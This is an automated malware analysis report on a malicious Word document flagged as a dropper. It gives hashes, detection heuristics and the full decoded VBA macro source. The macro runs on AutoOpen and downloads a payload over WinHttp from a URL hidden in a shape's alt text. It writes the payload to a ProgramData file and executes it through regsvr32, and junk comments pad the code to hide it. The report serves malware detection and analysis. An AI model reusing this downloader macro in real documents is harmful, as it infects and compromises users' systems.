Office (OOXML) malware analysis — malicious · f4d5e879a7722b39

MALICIOUS

Office (OOXML)

139.3 KB Created: 2020-10-06 10:13:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-10-09

MD5: 79e6b1a02dd9ffc291a9f130cd50e38f SHA-1: 6515d5d2b7ae121e8e7b4e70cda29cce0cd56fd5 SHA-256: f4d5e879a7722b390d132f1b5efe1f766971effe6a97df2751bf0788abb7edab

170 Risk Score

Heuristics 6

ClamAV: Doc.Dropper.Generic-9823819-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Generic-9823819-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set Owlmx = CreateObject("WinHttp.WinHttpRequest.5.1")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	10739 bytes
SHA-256: `8fb79442f7768dd5d854f77471fff44c3b2e5c1f26304490069e6147d6aaf68c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "XdcdK" Sub uMJwx(ioeQR, Optional ByVal LCOFb As String = "c:\programdata\Aelbj.pdf") ' Navigators ' Lunched ' Sundried furious depoliticisation rebuffs cithers examined undignified ' Uninsulated mildly disowning ' Lasso anaesthetise ' Promulgated businessmen ' Jeeps hopelessness glorification ' Nomads glistening counterpointed ' Astrophysical megaparsec thins ' Dissolute decomposable commandeering ' Hitchhikers murk excavator ' Debut pixies westernised cleanly poses slumber ' Poult omelette leaver ' Henry hangup indistinctly letterbox theorem kicking arisen ' Convected interferometric yeast toggle ' Wildfires cutlasses undeserved fission ' Resonances obtaining barman flanker shoestrings ' Rescaling crofters sicken unmatched nihilistic ' Composes imploringly enlarging winkles ' Permeated helplines selfrighteous breathlessness ' Pinup scuppered tells ' Usable sufficiently remould dyes ' Excavations ' Zinc holocausts analogical beauties ' Cockatoos anvil mudflows ' Nabbed coals ' Frisks ' Primeness healing ' Indefinable perhaps cygnet ' Seethrough glasgow sublime scrappy dribbling photolysis ' Merchantman luanda ' Baring ' Transformed ' Lingeringly shortfalls ' Definer churlishness ' Businesses camels ' Stellar oneness squealed polio mull ' Sponge rates ' Endogenously spore scoundrels shampooing shippable ' Azaleas droops cgCot = LCOFb Open cgCot For Output As #1 ' Scrape mullah dyslexia redeem ' Disharmonious fuzzed metastable indifferently freehand ' Anions headbands ' Chord cooperating flirts cunnilingus blacklisting artisans ' Loci geneticist dassie opener ' Hilltop postured viceroys sorriest aroma Print #1, ioeQR ' Divide ' Maximising furtiveness okay headon ' Cantata catalysis powerfulness ' Snatcher ' Closeness sanitation ' Applicants chekov Close #1 End Sub ' Pluralised ' Riffled dribble contestable whirling ' Payload foisting recuring energetically undemocratic ' Proponents bewilderingly soil ' Wimple stallholders radiograph Sub AutoOpen() ' Popeyed barking hype ' Diversify infractions givers whistling ' Incompleteness string ' Aurevoir hyperactive hopper ' Beaming salacious thereof toucans ' Dawdling grizzly ' Persian pickerel ' Hoverer martingale undistinguished ' Bern disdain ' Seascape elevate ' Fondled permed bout ' Braves origination statutorily ' Coefficient investigates loiter distinctive handbasin ' Levitate savants blinker garrulous ' Beanstalks ' Pheasants ' Succeeded slant audibly ' Imparts dissensions surrealistic international ' Onyx levers ' Wipe intuition denigrate prosecuting callings ' Unambiguity stickily metalled ' Checkout troughs boos ' Virgins workable dissipate admirer dad ' Soggiest goodish exert ' Obtrude unmnemonic holdings ' Tetrahedrons eminently exclusivist ' Deterrence ' Garnish registry replicated speculative controllable syndicated ' Bungalows rill thrifts Dim EOGSv As New psipl ' Deniers flapper altimeter fits hiatus ' Marginalised basest kinetics moribundly ' Tragically make endorsed slobbers reach ' Billiard fulminations grin chomped refuelling ' Deceitful throws lichee ioeQR = EOGSv.TSeMZ() ' Modifying coolants ' Premiership conceded ' Mailings festers vanilla sequencer ' Reversals embattled masquerade dexterously ' Outsold extraditable liking pout landless prostrate affordability uMJwx rlIHL(ioeQR) ' Savouring marmosets linesman steaming ' Cribbing mammalia reflexology ' Landmass ' Underwrote thor cocksure flint forfeited ' Complemented ' Torchbearer auditions hymen unclimbed sherbet ' Headmistresses hypnotherapy prefect ' Imputed imams LIdPp MwgNT(0) + "r32 c:\programdata\Aelbj.pdf", "" End Sub Function brlrH(egfXx, LLqkR) ' Reconsulting imperially ' Tues parkas agleam catalytic emblazoned borough ' Squalor interchanged correlate conventional accounting widget ' Sown bell ' Breasting capybara undid shallowest ' Blonde detainer brlrH = Split(egfXx, LLqkR) End Function Attribute VB_Name = "eBIWz" ' Fractured firing drachmas ' Pulmonary proprioceptive drat ' Sitar lowland boutique ' Oddly auditors ' Assignment joyfully Function rlIHL(mjqWh) ' Grandpa crises ' Relativistic laissezfaire youths unguessable ' Preset improvidence garrotting oddment persecutors ' Grasshopper constructive startups coiling ' Necked frigidly udders ' Toddled ' Pauper topologically breakable serviceability rlIHL = StrConv(mjqWh, vbUnicode) ' Lingerie deregulating ' Improbability ' Absorbing stablemate sabres ' Furriest censuring concubine littered ' Dampish snappy pop graph End Function ' Breakpoints catnip fostered blank appeal ' Soothingly grenades purge monolayer suncream ' Democracies bricklayer ' Tripwire juno excitement ' Procedurally Function FCJsc() ' Abuse nosily dakar scourging ' Shanties decoder hip bumble belike endotoxin gregariousness ' Aegina arriver intellectuals nicknamed scarifying makeweight ' Orderly octagons hairier ' Pushed dubbing plastic prescribed ' Quasar brochure clarifications cot amnesiac ' Transacted newsletter opportunely ' Purification refines ' Locking hauntingly essentialism stoves ' Checkering redrawn elites categorises ' Impalas maybe madden ' Institutionalise FCJsc = ActiveDocument.shapes(1).AlternativeText End Function ' Racehorses amphetamine decors renditions ' Cubing beset potpourri ' Distinguishes wintrier encampment ' Temperatures suggestion plutocrats propinquity ' Hood sacrum bulky Function MwgNT(VuHsr) ' Passport jetty suboptimal decimation pledges ' Healthiest icebergs uncharacteristic accolade chromosomes premiums ' Schoolboys vasectomies cleverer grapefruit apses ' Importer recommenced mandibles reasonableness reassuming ' January ' Coagulate market ' Bonnie ' Daringly garlands ' Venerable scoreless wordy unhooks deaden ' Flowers FROCO = FCJsc() bcLbv = brlrH(FROCO, "kristi") gpVNi = bcLbv(VuHsr) MwgNT = gpVNi End Function Attribute VB_Name = "psipl" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = False ' Daubing holdable requester ' Program ' Ingenuous echinoderm holmes metastases ' Forefingers misapplication functionalist hillock ' School saddens chapped Function TSeMZ() ' Braindead escapee helicopters chewed ' Overbearing ' Evaporator obsessive ' Endpapers tricks intuitively thistles ' Humbleness required tropospheric ' Unheard fertiliser careful clanged purify voltage ' Merger undress flabbier representatives genitive barracking enterprises Dim Owlmx As Object ' Stereotyped ' Adjustable niece hostess ' Treatable crunchy pacifists purser rounding ' Capstan watts worthies inquiringly ' Ravine monstrosities hypnotist ' Manoeuvred communities mourner permits Set Owlmx = CreateObject("WinHttp.WinHttpRequest.5.1") ' Subcommittee grooved liberate ' Proactive swahili sodas subeditors unassociated frock ' Telephoning firstborns abounding statutes guttering ' Soapiest disgorging narcissism arcadia refers ' Aphids girding proportionally dismiss ' Editorial ' Deactivates disaffection gallivanted understated radiographer romany superposed ' Jostled jettison ' Trusts ' Fleecing ' Dues wined sing ' Absentminded ' Stature untrodden loudhailer ' Persistent loppers ' Laud purist algiers opprobrium ' Roundness snored gargles pipettes ' Unclouded ' Tuxedo peace endows ' Individualist amiably vapid nonchalance cuckold ' Incompetently weep abode ' Guffawed knighthoods ' Resoundingly excel anthropometric reelects meaninglessness ' Pressurised distillation ' Fender month revivalist ' Building paltriest marsupial udders ' Recoiled consequent brought ' Benighted benign ' Varsity incendiary HcsyA = MwgNT(1) ' Editorial blackout notification ' Discharging intercepts disrobe retaining ' Indelible assign ' Generality pap unlawful ' Unwind impeding constrict Owlmx.Open "GET", HcsyA, False ' Passions copes ' Attitude peaty olympiad ' Incident comprising ' Moo ridicules wafted veers ' Arks necks Owlmx.Send ' Tether brooch ' Horrifically peculiarly necrophiliacs nest egress ' Baptised ' Depositions simpers goodfornothing ' Pointless undoubtedly retyped scree ' Snotty informational ferrets splinted leghorns enforce photographers TSeMZ = Owlmx.responsebody End Function Attribute VB_Name = "JLNqx" Sub LIdPp(HwGAX, PgmNn) ' Spiteful imply ' Collins placemen taboos rudders corroded ' Tutorials lysine dances forswear ' Asset forte july castigate soiree violating fraudulent ' Distance mincing solidness psychoanalytic ' Shareholding crushed ' Synapses creditably colossus lunar ' Storming upward ' Syncopation loitered tow tau ' Success thirsty hummocky rework irremovable ' Immense positivism leader ' Blasphemously underlain inveigh ' Compatriot boasts ' Misalignment denude Set zofDr = CreateObject(PgmNn + MwgNT(2) + "ll").exec(HwGAX) ' Homework ' Cowboy relaunching pontification irksome ' Sightless paganism motiveless ' Grosser cinema bemusement partisan diaphanous ' Calory garnishing oranges perspectives anatomists drop ' Saxony whale ' Fluency four memorandum cut misogynists scarcely retailing ' Intermissions tenth dilutions unsafely burlesque tourism ' Sotho awaking stiffer ' Vitiates miners urticaria ' Hooped revel ' Encage rotatable ' Folk ' Arcing albany ' Planetesimals relatives bladders scantiest wielding chair ' Conic baal endurance ' Yokes ought devotes ' Bungles coalesced raise ' Straightforward funerals vibrate ' Breezily badged reviver ' Astronomers perceptively weighs welcomed arum ' Directives preplanned breakout describers diminished ' Frothiest environments haiti initialising ' Brochure motions ' Principality ' Tricking ' Hammocks waived recuperates book monoclonal mistake ' Alludes havenots whirlwind ' Rending nugget invertible ' Soybeans trinity proficiently ' Laundries seminar graticule roadsweepers deficit ' Malformation unvarying degenerate ' Elusive burglar unpacked ' Resentments ferrule ' Explosive hovering cuddle ' Quaking tattoo dilatation windowshop stratospheric ' Exporters dilutes ' Unicameral dahlias redundantly prejudicing ' Lofted housebound End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	41984 bytes
SHA-256: `459ee087a0064c2360d7e130fea8fe20ebbc4de28b37d9b2bad9534efec6cab3`

Open this report in the interactive analyzer, or submit your own file for analysis.